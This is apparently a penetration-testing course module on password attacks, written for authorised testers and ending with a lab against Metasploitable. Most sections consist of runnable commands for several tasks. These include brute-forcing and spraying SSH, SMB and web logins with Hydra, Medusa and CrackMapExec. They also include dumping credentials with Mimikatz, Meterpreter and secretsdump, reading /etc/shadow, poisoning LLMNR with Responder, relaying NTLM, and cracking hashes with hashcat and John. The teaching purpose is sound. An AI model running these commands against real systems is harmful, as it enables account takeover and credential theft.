Opening Framing: Why Passwords Matter
Despite decades of security advances, passwords remain the dominant authentication method. And despite decades of warnings, people still choose weak passwords, reuse them across sites, and store them insecurely.
For penetration testers, password attacks are often the path of least resistance. A cracked password can provide legitimate access that bypasses technical controls entirely. One reused password can compromise an entire organization.
This week covers password attack methodologies: online attacks against live services, offline cracking of captured hashes, and the tools and techniques that make password attacks effective.
Key insight: The best technical security can be undone by a sticky note with "Password123!" written on it.
1) Password Attack Types
Understanding different attack approaches:
Online Attacks:
- Attack live authentication services
- Limited by network speed and lockouts
- Detectable by defenders
- Examples: SSH, FTP, web logins
Offline Attacks:
- Attack captured password hashes
- Limited only by computing power
- Undetectable (already have hashes)
- Much faster than online
Password Spraying:
- Few passwords against many accounts
- Avoids lockouts
- Effective against large organizations
- Uses common passwordsAttack Strategies:
Brute Force:
- Try every possible combination
- Guaranteed to work eventually
- Very slow for complex passwords
- aaa, aab, aac... zzz
Dictionary Attack:
- Try words from wordlist
- Much faster than brute force
- Depends on wordlist quality
- password, 123456, qwerty...
Hybrid Attack:
- Dictionary + modifications
- Adds numbers, symbols, case changes
- password → Password1, p@ssword, password123
Rule-Based Attack:
- Apply transformation rules
- Capitalize first letter
- Add year to end
- Substitute letters (a→@, e→3)
- password → P@ssw0rd2024Common Password Patterns:
People are predictable:
Patterns to exploit:
- Company name + numbers (Acme2024)
- Season + year (Summer2024!)
- Keyboard patterns (qwerty, 123456)
- Sports teams + numbers
- Names + birthdays
- Simple substitutions (p@ssw0rd)
Password policies create patterns:
- 8 chars minimum → exactly 8 chars
- Uppercase required → first letter capital
- Number required → number at end
- Symbol required → ! at end
Result: Password1! (meets policy, easily cracked)Key insight: Understanding human psychology is as important as understanding cracking tools. People follow patterns.
2) Online Password Attacks
Attacking live authentication services:
Hydra - Fast Online Cracker:
# Basic syntax
hydra -l username -P wordlist.txt [service]://[target]
# SSH attack
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
# FTP attack
hydra -l admin -P passwords.txt ftp://192.168.1.100
# HTTP Basic Auth
hydra -l admin -P passwords.txt http-get://192.168.1.100/admin
# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid password"
# Multiple users
hydra -L users.txt -P passwords.txt ssh://192.168.1.100
# Rate limiting
hydra -l admin -P passwords.txt -t 4 ssh://192.168.1.100Medusa - Another Online Tool:
# Medusa syntax
medusa -h [target] -u [user] -P [wordlist] -M [module]
# SSH
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh
# FTP
medusa -h 192.168.1.100 -u admin -P passwords.txt -M ftp
# SMB
medusa -h 192.168.1.100 -u admin -P passwords.txt -M smbnt
# Multiple hosts
medusa -H hosts.txt -u admin -P passwords.txt -M sshCrackMapExec - Network Swiss Army Knife:
# SMB password spraying
crackmapexec smb 192.168.1.0/24 -u admin -p passwords.txt
# With user list
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Password123!'
# Check for password reuse
crackmapexec smb 192.168.1.0/24 -u admin -p 'FoundPassword1'
# WinRM
crackmapexec winrm 192.168.1.100 -u admin -p passwords.txt
# SSH
crackmapexec ssh 192.168.1.100 -u admin -p passwords.txtPassword Spraying:
# Spray one password against many users
# Why spray?
# - Avoids account lockouts
# - Effective against organizations
# - Uses most common passwords
# Get user list first:
# - LinkedIn research
# - Email format discovery
# - LDAP enumeration
# Common spray passwords:
Season + Year: Summer2024!, Winter2023!
Company + numbers: AcmeCorp1, Acme2024!
Default patterns: Welcome1!, Password123!
# Spray with crackmapexec
crackmapexec smb 192.168.1.100 -u users.txt -p 'Summer2024!' --continue-on-success
# Wait between attempts to avoid detection
# Some tools have built-in delaysKey insight: Online attacks are slow and detectable. Use them surgically with good wordlists, not massive brute force.
3) Password Hash Fundamentals
Understanding hashes is essential for offline attacks:
What is a Hash?
Hashing:
- One-way mathematical function
- Same input = same output (deterministic)
- Cannot reverse to get original
- "password" → "5f4dcc3b5aa765d61d8327deb882cf99"
Hashes are NOT encryption:
- Encryption is reversible (with key)
- Hashing is one-way
- You crack hashes by guessing inputsCommon Hash Types:
MD5 (insecure, fast):
- 32 hex characters
- Example: 5f4dcc3b5aa765d61d8327deb882cf99
- Very fast to crack
SHA-1 (insecure):
- 40 hex characters
- Example: 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
SHA-256:
- 64 hex characters
- Still fast to crack without salt
NTLM (Windows):
- 32 hex characters
- Example: 32ed87bdb5fdc5e9cba88547376818d4
- Very fast to crack
NetNTLMv2 (Windows network):
- Captured from network
- Slower to crack
- Format: user::domain:challenge:response
bcrypt (strong):
- Starts with $2a$, $2b$, or $2y$
- Has built-in salt
- Slow by design
Linux shadow (SHA-512):
- Starts with $6$
- Format: $6$salt$hash
- Reasonably slowIdentifying Hash Types:
# By length and format:
32 chars, hex only → MD5 or NTLM
40 chars, hex only → SHA-1
64 chars, hex only → SHA-256
$1$... → MD5crypt (Linux)
$5$... → SHA-256crypt (Linux)
$6$... → SHA-512crypt (Linux)
$2a$..., $2b$...$2y$ → bcrypt
$y$..., $7$... → yescrypt
# Tools to identify:
hashid 'hash_here'
hash-identifier
hashcat --show -m 0 hash.txt # will error with suggestion
# Online:
https://hashes.com/en/tools/hash_identifierKey insight: Fast hashes (MD5, NTLM) crack in seconds. Slow hashes (bcrypt) can take years. Hash type matters enormously.
4) Offline Password Cracking
Cracking captured hashes with powerful tools:
John the Ripper:
# John the Ripper - versatile cracker
# Basic usage (auto-detect hash type)
john hashes.txt
# Specify wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Specify hash format
john --format=raw-md5 --wordlist=rockyou.txt hashes.txt
john --format=nt --wordlist=rockyou.txt hashes.txt
# Show cracked passwords
john --show hashes.txt
# Use rules for mutations
john --wordlist=rockyou.txt --rules hashes.txt
# Common formats:
--format=raw-md5
--format=raw-sha1
--format=nt # NTLM
--format=sha512crypt # Linux shadow
# Crack Linux shadow file
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john --wordlist=rockyou.txt unshadowed.txtHashcat - GPU-Powered Cracking:
# Hashcat - fastest cracker (uses GPU)
# Basic syntax
hashcat -m [mode] -a [attack] hashes.txt wordlist.txt
# Common modes (-m):
0 = MD5
100 = SHA1
1000 = NTLM
1800 = SHA-512 (Unix)
3200 = bcrypt
5600 = NetNTLMv2
# Attack modes (-a):
0 = Dictionary
1 = Combination
3 = Brute force/mask
6 = Dictionary + mask
7 = Mask + dictionary
# Dictionary attack
hashcat -m 0 -a 0 hashes.txt rockyou.txt
# With rules
hashcat -m 0 -a 0 hashes.txt rockyou.txt -r rules/best64.rule
# Brute force with mask
hashcat -m 0 -a 3 hashes.txt ?a?a?a?a?a?a
# Mask charsets:
?l = lowercase (a-z)
?u = uppercase (A-Z)
?d = digits (0-9)
?s = symbols
?a = all printable
# Example: 8 chars, starts with capital, ends with 2 digits
hashcat -m 1000 -a 3 hashes.txt ?u?l?l?l?l?l?d?d
# Show cracked
hashcat -m 1000 hashes.txt --showCracking Strategies:
# Progressive approach:
1. Try common passwords first
hashcat -m 1000 hashes.txt top1000.txt
2. Try full rockyou
hashcat -m 1000 hashes.txt rockyou.txt
3. Add rules
hashcat -m 1000 hashes.txt rockyou.txt -r best64.rule
4. Try targeted wordlist
# Create list with company name, sports teams, etc.
hashcat -m 1000 hashes.txt custom.txt -r best64.rule
5. Mask attacks for remaining
hashcat -m 1000 hashes.txt -a 3 ?u?l?l?l?l?l?d?d?s
# Custom wordlist creation:
# Use CeWL to scrape target website
cewl https://target.com -d 2 -m 5 -w custom_words.txt
# Combine with rules for mutationsKey insight: Hashcat with GPU is orders of magnitude faster than CPU-based cracking. NTLM hashes crack at billions/second.
5) Obtaining Password Hashes
Before cracking, you need hashes:
Windows Hash Extraction:
# From compromised Windows system
# Mimikatz (most common)
mimikatz.exe
> privilege::debug
> sekurlsa::logonpasswords
> lsadump::sam
# Meterpreter
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
# Secretsdump (remote with creds)
secretsdump.py domain/user:password@target
# SAM database (offline)
# Copy SAM and SYSTEM from:
# C:\Windows\System32\config\SAM
# C:\Windows\System32\config\SYSTEM
# Extract:
samdump2 SYSTEM SAMLinux Hash Extraction:
# Linux stores hashes in /etc/shadow
# Need root access to read
cat /etc/shadow
# Format:
username:$6$salt$hash:last:min:max:warn:inactive:expire
# Unshadow for John
unshadow /etc/passwd /etc/shadow > unshadowed.txt
# Or extract just hashes
cat /etc/shadow | grep -v '!' | cut -d: -f1,2Network Hash Capture:
# Capture NetNTLMv2 hashes from network
# Responder - poison LLMNR/NBT-NS
sudo responder -I eth0 -wrf
# When victim browses \\attacker or similar:
# Captures NetNTLMv2 hashes
# Crack captured hash:
hashcat -m 5600 captured_hash.txt rockyou.txt
# NTLM relay (use hash without cracking)
ntlmrelayx.py -t smb://target -smb2supportDatabase Credentials:
# From SQL injection
# MySQL
SELECT user,password FROM mysql.user;
# PostgreSQL
SELECT usename,passwd FROM pg_shadow;
# MSSQL
SELECT name,password_hash FROM sys.sql_logins;
# Web application databases
# Often MD5 or bcrypt hashed
SELECT username,password FROM users;Key insight: Hash extraction often requires elevated privileges. But once you have hashes, cracking is undetectable.
Real-World Context: Password Attacks in Practice
Professional considerations for password attacks:
Account Lockouts: Online attacks can lock out users, causing disruption. Always check lockout policies and coordinate with the client. Password spraying minimizes this risk.
Scope Considerations: Cracked passwords may grant access to systems outside your scope. Stop and report when you find credentials that could cross boundaries.
Credential Reuse: Found passwords should be tested against other services (within scope). Credential reuse is extremely common and often leads to broader compromise.
MITRE ATT&CK Mapping:
- T1110 - Brute Force: Online password attacks
- T1003 - OS Credential Dumping: Hash extraction
- T1558 - Steal or Forge Kerberos Tickets: Windows auth attacks
Key insight: A single cracked password often leads to complete domain compromise through credential reuse and lateral movement.
Guided Lab: Password Attack Practice
Practice password attacks against Metasploitable.